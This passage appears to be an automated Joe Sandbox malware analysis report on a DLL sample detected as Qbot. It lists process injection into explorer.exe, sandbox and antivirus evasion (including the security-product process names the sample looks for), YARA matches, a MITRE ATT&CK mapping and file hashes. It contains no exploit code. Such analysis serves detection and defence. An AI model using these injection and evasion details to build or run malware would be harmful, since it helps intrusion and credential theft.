          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6D508BA6 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6D508BA6
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6D50880E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_6D50880E
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6D50BCDC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_6D50BCDC
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6D508BA6 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_6D508BA6

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Maps a DLL or memory area into another process
          Source: C:\Windows\System32\loaddll32.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and writeJump to behavior
          Writes to foreign memory regions
          Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 2FB0000Jump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: DF380Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 2E50000Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: DF380Jump to behavior
          Allocates memory in foreign processes
          Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 2FB0000 protect: page read and writeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 2E50000 protect: page read and writeJump to behavior
          Injects code into the Windows Explorer (explorer.exe)
          Source: C:\Windows\System32\loaddll32.exeMemory written: PID: 5128 base: 2EC0000 value: B8Jump to behavior
          Source: C:\Windows\System32\loaddll32.exeMemory written: PID: 5128 base: 2DFB2D8 value: 00Jump to behavior
          Source: C:\Windows\System32\loaddll32.exeMemory written: PID: 5128 base: 2DFC1E8 value: 00Jump to behavior
          Source: C:\Windows\System32\loaddll32.exeMemory written: PID: 5128 base: 2F00000 value: 9CJump to behavior
          Source: C:\Windows\System32\loaddll32.exeMemory written: PID: 5128 base: DF380 value: E9Jump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 4892 base: 2FB0000 value: 9CJump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 4892 base: DF380 value: E9Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5784 base: 26E0000 value: B8Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5784 base: 25702D8 value: 00Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5784 base: 25711E8 value: 00Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5784 base: 2720000 value: 9CJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5784 base: DF380 value: E9Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 4700 base: 2E50000 value: 9CJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 4700 base: DF380 value: E9Jump to behavior
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\_Rsr.dll",#1Jump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 656Jump to behavior
          Source: C:\Windows\System32\loaddll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6D5089EB cpuid 0_2_6D5089EB
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6D50872B GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_6D50872B
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_027AE040 GetCurrentProcessId,GetLastError,GetSystemMetrics,GetVersionExA,GetWindowsDirectoryW,2_2_027AE040
          Source: loaddll32.exe, 00000000.00000003.388520207.000000000286F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000003.375579660.00000000047FF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.375665810.0000000004E7F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.375323678.00000000049AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bdagent.exe
          Source: loaddll32.exe, 00000000.00000003.388520207.000000000286F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000003.375579660.00000000047FF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.375665810.0000000004E7F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.375323678.00000000049AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vsserv.exe
          Source: loaddll32.exe, 00000000.00000003.388520207.000000000286F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000003.375579660.00000000047FF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.375665810.0000000004E7F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.375323678.00000000049AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avp.exe
          Source: loaddll32.exe, 00000000.00000003.388520207.000000000286F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000003.375579660.00000000047FF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.375665810.0000000004E7F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.375323678.00000000049AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avgcsrvx.exe
          Source: loaddll32.exe, 00000000.00000003.388520207.000000000286F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000003.375579660.00000000047FF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.375665810.0000000004E7F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.375323678.00000000049AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mcshield.exe
          Source: loaddll32.exe, 00000000.00000003.388520207.000000000286F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000003.375579660.00000000047FF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.375665810.0000000004E7F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.375323678.00000000049AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe

          Stealing of Sensitive Information

          barindex
          Yara detected Qbot
          Source: Yara matchFile source: 3.2.rundll32.exe.3100000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.3.regsvr32.exe.2cce488.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.3.regsvr32.exe.2cce488.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.explorer.exe.2f80000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.regsvr32.exe.27a0000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.0.explorer.exe.26f0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.rundll32.exe.2eb0000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.3.regsvr32.exe.2cce488.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.rundll32.exe.2eb0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 22.0.explorer.exe.2ed0000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.0.explorer.exe.2f80000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 19.2.explorer.exe.2e20000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.rundll32.exe.3100000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 22.0.explorer.exe.2ed0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 19.2.explorer.exe.2e20000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 19.0.explorer.exe.2e20000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 22.2.explorer.exe.2ed0000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.loaddll32.exe.a20000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.explorer.exe.2f80000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.3.regsvr32.exe.2cce488.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.2.explorer.exe.26f0000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 19.0.explorer.exe.2e20000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.regsvr32.exe.27a0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.2.explorer.exe.26f0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.0.explorer.exe.2f80000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.0.explorer.exe.26f0000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 22.2.explorer.exe.2ed0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.loaddll32.exe.a20000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000003.375314795.0000000002CD1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.374998186.0000000004812000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.375073363.0000000002CCE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000002.644257904.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000000.395725211.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.387752109.0000000003100000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.400269525.00000000026F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000003.375512437.0000000004C33000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.388462943.0000000000926000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000000.384502411.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000000.386652741.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.396304567.0000000000A20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.387696513.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.399869043.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000000.386871374.00000000026F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.374228221.0000000002CCE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.397766828.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected Qbot
          Source: Yara matchFile source: 3.2.rundll32.exe.3100000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.3.regsvr32.exe.2cce488.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.3.regsvr32.exe.2cce488.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.explorer.exe.2f80000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.regsvr32.exe.27a0000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.0.explorer.exe.26f0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.rundll32.exe.2eb0000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.3.regsvr32.exe.2cce488.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.rundll32.exe.2eb0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 22.0.explorer.exe.2ed0000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.0.explorer.exe.2f80000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 19.2.explorer.exe.2e20000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.rundll32.exe.3100000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 22.0.explorer.exe.2ed0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 19.2.explorer.exe.2e20000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 19.0.explorer.exe.2e20000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 22.2.explorer.exe.2ed0000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.loaddll32.exe.a20000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.explorer.exe.2f80000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.3.regsvr32.exe.2cce488.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.2.explorer.exe.26f0000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 19.0.explorer.exe.2e20000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.regsvr32.exe.27a0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.2.explorer.exe.26f0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.0.explorer.exe.2f80000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.0.explorer.exe.26f0000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 22.2.explorer.exe.2ed0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.loaddll32.exe.a20000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000003.375314795.0000000002CD1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.374998186.0000000004812000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.375073363.0000000002CCE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000002.644257904.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000000.395725211.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.387752109.0000000003100000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.400269525.00000000026F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000003.375512437.0000000004C33000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.388462943.0000000000926000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000000.384502411.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000000.386652741.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.396304567.0000000000A20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.387696513.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.399869043.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000000.386871374.00000000026F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.374228221.0000000002CCE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.397766828.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts2
          Native API          		1
          DLL Side-Loading          		411
          Process Injection          		1
          Masquerading          		1
          Credential API Hooking          		1
          System Time Discovery          		Remote Services1
          Screen Capture          		Exfiltration Over Other Network Medium1
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
          DLL Side-Loading          		1
          Disable or Modify Tools          		1
          Input Capture          		14
          Security Software Discovery          		Remote Desktop Protocol1
          Credential API Hooking          		Exfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)2
          Virtualization/Sandbox Evasion          		Security Account Manager2
          Virtualization/Sandbox Evasion          		SMB/Windows Admin Shares1
          Input Capture          		Automated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)411
          Process Injection          		NTDS2
          Process Discovery          		Distributed Component Object Model1
          Archive Collected Data          		Scheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Obfuscated Files or Information          		LSA Secrets1
          Application Window Discovery          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common1
          Regsvr32          		Cached Domain Credentials1
          Remote System Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items1
          Rundll32          		DCSync1
          File and Directory Discovery          		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
          DLL Side-Loading          		Proc Filesystem24
          System Information Discovery          		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 701477 Sample: _Rsr.dll Startdate: 12/09/2022 Architecture: WINDOWS Score: 84 38 Malicious sample detected (through community Yara rule) 2->38 40 Yara detected Qbot 2->40 42 Machine Learning detection for sample 2->42 44 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 2->44 8 loaddll32.exe 1 2->8         started        process3 signatures4 46 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 8->46 48 Injects code into the Windows Explorer (explorer.exe) 8->48 50 Maps a DLL or memory area into another process 8->50 11 rundll32.exe 8->11         started        14 regsvr32.exe 8->14         started        16 cmd.exe 1 8->16         started        18 3 other processes 8->18 process5 file6 52 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 11->52 54 Injects code into the Windows Explorer (explorer.exe) 11->54 56 Writes to foreign memory regions 11->56 21 explorer.exe 11->21         started        23 conhost.exe 11->23         started        58 Allocates memory in foreign processes 14->58 60 Maps a DLL or memory area into another process 14->60 25 explorer.exe 14->25         started        27 rundll32.exe 16->27         started        36 C:\Users\user\Desktop\_Rsr.dll, PE32 18->36 dropped 30 WerFault.exe 23 9 18->30         started        32 WerFault.exe 18->32         started        signatures7 process8 signatures9 62 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 27->62 64 Injects code into the Windows Explorer (explorer.exe) 27->64 66 Maps a DLL or memory area into another process 27->66 34 explorer.exe 27->34         started        process10

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          _Rsr.dll100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          0.2.loaddll32.exe.a20000.0.unpack100%AviraHEUR/AGEN.1234562Download File
          18.2.explorer.exe.2f80000.0.unpack100%AviraHEUR/AGEN.1234562Download File
          22.0.explorer.exe.2ed0000.0.unpack100%AviraHEUR/AGEN.1234562Download File
          3.2.rundll32.exe.3100000.0.unpack100%AviraHEUR/AGEN.1234562Download File
          19.2.explorer.exe.2e20000.0.unpack100%AviraHEUR/AGEN.1234562Download File
          20.0.explorer.exe.26f0000.0.unpack100%AviraHEUR/AGEN.1234562Download File
          4.2.rundll32.exe.2eb0000.0.unpack100%AviraHEUR/AGEN.1234562Download File
          19.0.explorer.exe.2e20000.0.unpack100%AviraHEUR/AGEN.1234562Download File
          2.2.regsvr32.exe.27a0000.0.unpack100%AviraHEUR/AGEN.1234562Download File
          20.2.explorer.exe.26f0000.0.unpack100%AviraHEUR/AGEN.1234562Download File
          18.0.explorer.exe.2f80000.0.unpack100%AviraHEUR/AGEN.1234562Download File
          22.2.explorer.exe.2ed0000.0.unpack100%AviraHEUR/AGEN.1234562Download File

          Domains

          No Antivirus matches

          URLs

          No Antivirus matches

          Domains and IPs

          Contacted Domains

          No contacted domains info

          World Map of Contacted IPs

          No contacted IP infos

          General Information

          Joe Sandbox Version:36.0.0 Rainbow Opal
          Analysis ID:701477
          Start date and time:2022-09-12 18:09:53 +02:00
          Joe Sandbox Product:CloudBasic
          Overall analysis duration:0h 8m 3s
          Hypervisor based Inspection enabled:false
          Report type:full
          Sample file name:_Rsr.dll
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
          Run name:Run with higher sleep bypass
          Number of analysed new started processes analysed:34
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Detection:MAL
          Classification:mal84.troj.evad.winDLL@26/5@0/0
          EGA Information:
          • Successful, ratio: 100%
          HDC Information:
          • Successful, ratio: 60.7% (good quality ratio 57.7%)
          • Quality average: 78.6%
          • Quality standard deviation: 28.5%
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 30
          • Number of non-executed functions: 60
          Cookbook Comments:
          • Found application associated with file extension: .dll
          • Sleeps bigger than 300000ms are automatically reduced to 1000ms

          Warnings

          • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, svchost.exe
          • Excluded IPs from analysis (whitelisted): 52.182.143.212, 20.82.228.9, 20.82.154.241
          • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, eudb.ris.api.iris.microsoft.com, ctldl.windowsupdate.com, arc.msn.com, neus1c-displaycatalog.frontdoor.bigcatalog.commerce.microsoft.com, ris.api.iris.microsoft.com, rp-consumer-prod-displaycatalog-geomap.trafficmanager.net, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, neus2c-displaycatalog.frontdoor.bigcatalog.commerce.microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net
          • Not all processes where analyzed, report is missing behavior information
          • Report creation exceeded maximum time and may have missing disassembly code information.
          • Report size exceeded maximum capacity and may have missing behavior information.
          • Report size getting too big, too many NtReadVirtualMemory calls found.

          Simulations

          Behavior and APIs

          No simulations

          Joe Sandbox View / Context

          IPs

          No context

          Domains

          No context

          ASNs

          No context

          JA3 Fingerprints

          No context

          Dropped Files

          No context

          Created / dropped Files

          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_5b9cebf93c5cf51a32b33c9da85819825cf43a_82810a17_16f011cf\Report.wer

          Download File
          Process:C:\Windows\SysWOW64\WerFault.exe
          File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
          Category:dropped
          Size (bytes):65536
          Entropy (8bit):0.9048599824278574
          Encrypted:false
          SSDEEP:192:mQRvi90oXiHBUZMX4jed+6/u7skS274ItWc:mKiTX6BUZMX4jef/u7skX4ItWc
          MD5:BA140683905DC21D8228DFB5EAA00FCB
          SHA1:8D742356F74FF037EF57472C887838452EEC3F36
          SHA-256:35053AA03EE4BD77E96425CD92BA16795B3C6112B55DB74F1B50D7A2E6ECBCC0
          SHA-512:0321B33E88FEE79855D4F342688C45B10ADCCEC033F7FDD979C58CD5DC55A3DD2FDF0B8DCC842849BE7CD3BEBC7D2F2AE10E447D86B850ED87E3EAB44EA9B4BB
          Malicious:false
